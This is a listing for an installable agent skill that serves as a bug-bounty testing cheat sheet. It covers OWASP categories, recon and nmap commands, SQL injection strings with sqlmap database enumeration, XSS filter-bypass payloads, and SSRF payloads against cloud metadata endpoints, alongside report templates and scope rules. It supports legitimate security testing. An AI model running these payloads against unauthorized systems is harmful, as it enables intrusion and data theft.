bug-bounty-program

仓库: dengineproblem/agents-monorepo
安装量: 62
排名: #12054

安装

npx skills add https://github.com/dengineproblem/agents-monorepo --skill bug-bounty-program

Bug Bounty Program Specialist Эксперт по исследованию уязвимостей и bug bounty hunting. Методология тестирования OWASP Top 10 Focus Injection (SQL, NoSQL, LDAP, OS commands) Broken Authentication Sensitive Data Exposure XML External Entities (XXE) Broken Access Control Security Misconfiguration Cross-Site Scripting (XSS) Insecure Deserialization Using Components with Known Vulnerabilities Insufficient Logging & Monitoring Распределение усилий Reconnaissance: 30% Manual testing: 50% Automated scanning: 20% Reconnaissance Subdomain Enumeration

Пассивное перечисление

amass enum -passive -d target.com -o subdomains.txt

Активное перечисление

subfinder -d target.com -all -o subfinder.txt

DNS брутфорс

gobuster dns -d target.com -w wordlist.txt -o gobuster.txt

Объединение результатов

cat subdomains.txt subfinder.txt gobuster.txt | sort -u

all_subs.txt Technology Stack Identification

Wappalyzer CLI

wappalyzer https://target.com

WhatWeb

whatweb -a 3 https://target.com

Nuclei technology detection

nuclei -u https://target.com -t technologies/ Port Scanning

Быстрое сканирование

nmap -sS -sV -O -p- --min-rate 1000 target.com -oA nmap_full

Сканирование сервисов

nmap -sC -sV -p 80,443 ,8080,8443 target.com -oA nmap_services SQL Injection Testing Manual Detection -- Error-based ' OR ' 1 '=' 1 ' AND ' 1 '=' 2 ' UNION SELECT NULL-- -- Time-based blind ' ; WAITFOR DELAY '00:00:05' -- ' OR SLEEP(5)-- -- Boolean-based blind ' AND 1 = 1 -- ' AND 1 = 2 -- SQLMap

Basic injection test

sqlmap -u "https://target.com/page?id=1" --batch

With authentication

sqlmap -u "https://target.com/page?id=1" --cookie = "session=abc123" --batch

POST data

sqlmap -u "https://target.com/login" --data = "user=test&pass=test" --batch

Database enumeration

sqlmap -u "https://target.com/page?id=1" --dbs --batch sqlmap -u "https://target.com/page?id=1" -D dbname --tables --batch XSS Testing Payload Types // Reflected XSS < script

alert ( 'XSS' ) < / script

< img src = x onerror = alert ( 'XSS' )

< svg onload = alert ( 'XSS' )

// DOM-based XSS javascript : alert ( 'XSS' ) data : text / html , < script

alert ( 'XSS' ) < / script

// Bypass filters < ScRiPt

alert ( 'XSS' ) < / ScRiPt

< img src = x onerror = "alert('XSS')"

< svg / onload = alert ( 'XSS' )

// Stored XSS via different contexts "

< script

alert ( 'XSS' ) < / script

'-alert(' XSS ')-' < / title

< script

alert ( 'XSS' ) < / script

Context-Specific Payloads // In HTML attribute " onfocus=alert('XSS') autofocus=" ' onfocus=alert(' XSS ') autofocus=' // In JavaScript string ';alert(' XSS ' ) ; // "-alert('XSS')-" // In URL parameter javascript : alert ( 'XSS' ) data : text / html , < script

alert ( 'XSS' ) < / script

SSRF Testing Basic Payloads

Localhost bypass

http://127.0.0.1 http://localhost http://[::1] http://0.0.0.0 http://127.1 http://0177.0.0.1

Cloud metadata

http://169.254.169.254/latest/meta-data/ http://metadata.google.internal/ Detection Methods

Out-of-band detection using Burp Collaborator

url

"http://your-collaborator-id.burpcollaborator.net"

Webhook.site for testing

url

"https://webhook.site/unique-id" Report Writing Structure

Vulnerability Report

Summary [One-line description]

Severity [Critical/High/Medium/Low] - CVSS Score: X.X

Affected Component [URL/Endpoint/Feature]

Description [Detailed technical explanation]

Steps to Reproduce 1. [Step 1] 2. [Step 2] 3. [Step 3]

Proof of Concept [Screenshots, code, requests]

Impact [Business/technical impact]

Remediation [Specific recommendations]

References [CVE, OWASP, etc.] CVSS Calculator Factors Attack Vector (AV): Network/Adjacent/Local/Physical Attack Complexity (AC): Low/High Privileges Required (PR): None/Low/High User Interaction (UI): None/Required Scope (S): Unchanged/Changed Confidentiality Impact (C): None/Low/High Integrity Impact (I): None/Low/High Availability Impact (A): None/Low/High Tools Checklist Reconnaissance Amass / Subfinder Nmap Shodan Google Dorks Web Testing Burp Suite OWASP ZAP SQLMap Nuclei Automation ffuf (fuzzing) httpx (probing) waybackurls gau (URLs gathering) Ethical Guidelines Stay in scope — тестируйте только разрешенные цели Don't be destructive — избегайте DoS и потери данных Protect data — не распространяйте найденные данные Report responsibly — следуйте disclosure policy Document everything — ведите детальные записи Respect rate limits — не перегружайте системы Program Selection Strategy Criteria Response time history Bounty amounts Scope breadth Program maturity Community feedback Priority Matrix Program Type Skill Level Potential New programs Any High Broad scope Intermediate Medium Narrow scope Expert Low-Medium VDP only Beginner Low

返回排行榜